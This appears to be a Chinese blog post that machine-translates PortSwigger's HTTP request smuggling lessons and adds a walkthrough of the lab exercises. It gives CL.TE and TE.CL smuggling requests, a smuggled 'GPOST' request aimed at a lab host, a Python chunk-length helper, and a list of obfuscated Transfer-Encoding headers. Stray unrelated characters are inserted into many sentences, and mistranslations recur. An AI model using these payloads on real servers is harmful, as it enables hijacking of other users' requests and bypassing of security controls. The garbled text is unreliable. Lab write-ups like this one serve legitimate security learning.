實(shí)驗(yàn)環(huán)境：https://portswigger.net/web-security/request-smuggling
這里把原版翻譯(機(jī)翻)一下绿语，再附上解題過程

1.什么是HTTP請(qǐng)求走私劳景？

HTTP請(qǐng)求走私是一種干擾網(wǎng)站處理從一個(gè)或多個(gè)用戶接收的HTTP請(qǐng)求序列的方式的技術(shù)。請(qǐng)求走私漏洞在本質(zhì)上通常是至關(guān)重要的梯投，允許攻擊者繞過安全控制，獲得對(duì)敏感數(shù)據(jù)的未經(jīng)授權(quán)的訪問余素，并直接危害其他應(yīng)用程序用戶蒙兰。

image.png

注
http請(qǐng)求走私最早記錄在2005年闻鉴，最近又由portswigger研究關(guān)于這個(gè)話題茵乱。

2.HTTP請(qǐng)求走私攻擊會(huì)發(fā)生什么？

今天的Web應(yīng)用程序經(jīng)常在用戶和最終應(yīng)用程序邏輯之間使用HTTP服務(wù)器鏈孟岛。用戶將請(qǐng)求發(fā)送到前端服務(wù)器(有時(shí)稱為負(fù)載均衡器或反向代理)瓶竭，此服務(wù)器將請(qǐng)求轉(zhuǎn)發(fā)給一個(gè)或多個(gè)后端服務(wù)器。這種架構(gòu)在現(xiàn)代基于云的應(yīng)用程序中越來越普遍蚀苛，在某些情況下是不可避免的在验。

當(dāng)前端服務(wù)器將HTTP請(qǐng)求轉(zhuǎn)發(fā)到后端服務(wù)器時(shí)玷氏，通常會(huì)通過相同的后端網(wǎng)絡(luò)連接發(fā)送多個(gè)請(qǐng)求堵未，因?yàn)檫@樣做的效率和性能要高得多。協(xié)議非常簡單：一個(gè)接一個(gè)地發(fā)送HTTP請(qǐng)求盏触，接收服務(wù)器解析HTTP請(qǐng)求頭渗蟹，以確定一個(gè)請(qǐng)求的結(jié)束位置和下一個(gè)請(qǐng)求開始的位置：

image.png

在這種情況下块饺，前端和后端系統(tǒng)必須就請(qǐng)求之間的邊界達(dá)成一致。否則雌芽，攻擊者可能會(huì)發(fā)送由前端系統(tǒng)和后端系統(tǒng)不同解釋的模糊請(qǐng)求：

image.png

3.HTTP請(qǐng)求走私漏洞是如何產(chǎn)生的谷朝？

大多數(shù)HTTP請(qǐng)求走私漏洞的出現(xiàn)是因?yàn)镠TTP規(guī)范提供了兩種不同的方法來指定請(qǐng)求的結(jié)束位置：內(nèi)容長度頭和傳輸編碼頭球。

這個(gè)內(nèi)容長度標(biāo)頭很簡單：它指定消息體的長度(以字節(jié)為單位)武花。例如：

POST /search HTTP/1.1
Host: normal-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

q=smuggling

這個(gè)傳輸編碼標(biāo)頭可用于指定消息主體使用分組編碼圆凰。這意味著消息體包含一個(gè)或多個(gè)數(shù)據(jù)塊。每個(gè)塊包含以字節(jié)為單位的塊大小(以十六進(jìn)制表示)体箕，后面是換行符专钉，后面是塊內(nèi)容。消息以0大小的塊結(jié)束累铅。例如：

POST /search HTTP/1.1
Host: normal-website.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

b
q=smuggling
0

注
許多安全測(cè)試人員不知道可以在HTTP請(qǐng)求中使用分組編碼跃须，原因有二：

• Burp Suite自動(dòng)解壓分組編碼，使消息更易于查看和編輯娃兽。
• 瀏覽器通常不會(huì)在請(qǐng)求中使用分塊編碼回怜，而且通常只在服務(wù)器響應(yīng)中看到。

如果前端服務(wù)器和后端服務(wù)器的行為與傳輸編碼標(biāo)頭换薄，那么它們可能在連續(xù)請(qǐng)求之間的邊界上存在分歧玉雾，從而導(dǎo)致請(qǐng)求走私漏洞。

4.如何執(zhí)行HTTP請(qǐng)求走私攻擊

請(qǐng)求走私攻擊包括將內(nèi)容長度頭和傳輸編碼報(bào)頭進(jìn)入單個(gè)HTTP請(qǐng)求并對(duì)這些請(qǐng)求進(jìn)行操作轻要，以便前端服務(wù)器和后端服務(wù)器處理請(qǐng)求的方式不同复旬。具體的方式取決于這兩個(gè)服務(wù)器的行為：

• CL.TE：前端服務(wù)器使用內(nèi)容長度頭和后端服務(wù)器使用傳輸編碼頭球。
• TE.CL：前端服務(wù)器使用傳輸編碼頭和后端服務(wù)器使用內(nèi)容長度頭球冲泥。
• TE.TE：前端和后端服務(wù)器都支持傳輸編碼頭驹碍，但其中一臺(tái)服務(wù)器可以通過某種方式混淆報(bào)頭，從而避免對(duì)其進(jìn)行處理凡恍。

5.CL.TE漏洞

在這里志秃，前端服務(wù)器使用內(nèi)容長度頭和后端服務(wù)器使用傳輸編碼頭球。我們可以執(zhí)行以下簡單的HTTP請(qǐng)求走私攻擊：

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

前端服務(wù)器處理內(nèi)容長度標(biāo)頭嚼酝，并確定請(qǐng)求正文長度為13字節(jié)浮还，直到走私...此請(qǐng)求被轉(zhuǎn)發(fā)到后端服務(wù)器。

后端服務(wù)器處理傳輸編碼標(biāo)頭闽巩，因此將消息體視為使用塊編碼钧舌。它處理第一個(gè)塊担汤，它聲明為零長度，因此被視為終止請(qǐng)求洼冻。以下字節(jié)崭歧，走私，而后端服務(wù)器將將其視為序列中下一個(gè)請(qǐng)求的開始撞牢。

可以直接打開實(shí)驗(yàn)環(huán)境

image.png

image.png

這樣一個(gè)GET請(qǐng)求就被變成POST請(qǐng)求了

image.png

image.png

6.TE.CL漏洞

在這里率碾，前端服務(wù)器使用傳輸編碼頭和后端服務(wù)器使用內(nèi)容長度頭球。我們可以執(zhí)行以下簡單的HTTP請(qǐng)求走私攻擊：

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

注
要使用BurpRepeater發(fā)送此請(qǐng)求屋彪，首先需要轉(zhuǎn)到Repeater菜單播掷，并確保未選中“UpdateContent-Length”選項(xiàng)。
您需要包含尾隨序列0后面的r\n\r\n.
前端服務(wù)器處理傳輸編碼標(biāo)頭撼班，因此將消息體視為使用塊編碼歧匈。它處理第一個(gè)塊，它被聲明為8個(gè)字節(jié)長砰嘁，直到下面一行的開頭走私...它處理第二個(gè)塊件炉，它聲明為零長度，因此被視為終止請(qǐng)求矮湘。此請(qǐng)求被轉(zhuǎn)發(fā)到后端服務(wù)器斟冕。

后端服務(wù)器處理內(nèi)容長度標(biāo)頭，并確定請(qǐng)求體長度為3字節(jié)缅阳，直到下面一行的開頭8...以下字節(jié)磕蛇，以走私，而后端服務(wù)器將將其視為序列中下一個(gè)請(qǐng)求的開始十办。

image.png

跟剛才一樣

image.png

image.png

image.png

GPOST / HTTP/1.1\r\nHost: ac531f741fc6086980080ac6000c004a.web-security-academy.net\r\n\r\n

這個(gè)數(shù)量可能不好計(jì)算,我寫了個(gè)python3的代碼,可以參考一下

# 專門用來計(jì)算chunked的長度
# 用在TE.CL模式的 第一個(gè)分塊的長度計(jì)算

# 請(qǐng)把你的內(nèi)容放在第三個(gè)雙引號(hào)后面  a = """"""
a = """GPOST / HTTP/1.1
Host: ac531f741fc6086980080ac6000c004a.web-security-academy.net

"""
# a = """"""
n_num = 0
for i in a:
    if i == '\n':
        n_num += 1
print(hex(len(a) + n_num)[2:])

7. TE.TE行為：混淆TE頭

在這里秀撇，前端服務(wù)器和后端服務(wù)器都支持傳輸編碼頭，但其中一臺(tái)服務(wù)器可以通過某種方式混淆報(bào)頭向族，從而避免對(duì)其進(jìn)行處理呵燕。

有潛在的無窮盡的方法來混淆傳輸編碼頭球。例如：
1

Transfer-Encoding: xchunked

2

Transfer-Encoding : chunked

3

Transfer-Encoding: chunked
Transfer-Encoding: x

4

Transfer-Encoding:[tab]chunked

5

[space]Transfer-Encoding: chunked

6

X: X[\n]Transfer-Encoding: chunked

7

Transfer-Encoding
: chunked

據(jù)我測(cè)試6和7是不支持的,1件相、2再扭、5對(duì)于本題是不能用的,4不能用來解題，3可以

這些技術(shù)中的每一種都涉及到與HTTP規(guī)范的微妙背離夜矗。實(shí)現(xiàn)協(xié)議規(guī)范的真實(shí)世界代碼很少以絕對(duì)精確的方式依附它泛范，而且不同的實(shí)現(xiàn)通常會(huì)容忍與規(guī)范不同的變化。要發(fā)現(xiàn)TEt.E漏洞紊撕，必須找到傳輸編碼標(biāo)頭罢荡，使得只有一個(gè)前端或后端服務(wù)器處理它，而另一個(gè)服務(wù)器忽略它。

取決于可以誘導(dǎo)不處理模糊處理的是前端服務(wù)器還是后端服務(wù)器柠傍。傳輸編碼標(biāo)頭時(shí)，其余的攻擊將采取與前面描述的CL.TE或TE.CL漏洞相同的形式辩稽。

image.png

image.png

image.png